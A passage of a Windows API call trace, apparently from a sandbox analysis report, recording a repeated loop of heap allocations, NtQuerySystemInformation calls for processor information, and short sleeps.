hHeap=0x2560000) returned 1 [0246.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.879] Sleep (dwMilliseconds=0x110) [0246.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0246.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0246.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0246.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0246.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0246.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0246.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0246.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0246.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.893] Sleep (dwMilliseconds=0x110) [0246.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0246.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0246.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0246.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0246.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0246.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0246.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0246.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0246.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.913] Sleep (dwMilliseconds=0x110) [0246.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0246.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0246.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0246.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0246.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0246.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0246.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0246.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0246.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.923] Sleep (dwMilliseconds=0x110) [0246.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0246.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0246.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0246.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0246.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0246.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0246.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.938] Sleep (dwMilliseconds=0x110) [0246.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0246.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0246.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0246.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0246.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0246.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0246.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0246.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0246.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.957] Sleep (dwMilliseconds=0x110) [0246.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0246.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0246.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0246.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0246.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0246.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0246.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0246.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0246.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.971] Sleep (dwMilliseconds=0x110) [0246.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0246.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0246.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0246.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0246.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0246.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0246.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0246.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0246.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.985] Sleep (dwMilliseconds=0x110) [0247.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0247.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0247.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0247.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0247.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0247.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0247.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.005] Sleep (dwMilliseconds=0x110) [0247.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0247.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0247.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0247.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0247.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0247.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0247.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0247.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0247.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.019] Sleep (dwMilliseconds=0x110) [0247.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0247.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0247.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0247.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0247.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0247.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0247.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0247.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0247.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.033] Sleep (dwMilliseconds=0x110) [0247.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0247.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0247.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0247.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0247.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0247.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0247.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0247.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0247.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.052] Sleep (dwMilliseconds=0x110) [0247.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0247.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0247.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0247.132] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0247.133] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0247.133] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0247.133] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.133] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.134] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.134] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.134] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.134] Sleep (dwMilliseconds=0x110) [0247.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0247.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0247.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0247.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0247.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0247.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0247.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0247.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0247.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.141] Sleep (dwMilliseconds=0x110) [0247.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0247.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0247.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0247.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0247.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0247.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0247.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0247.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, 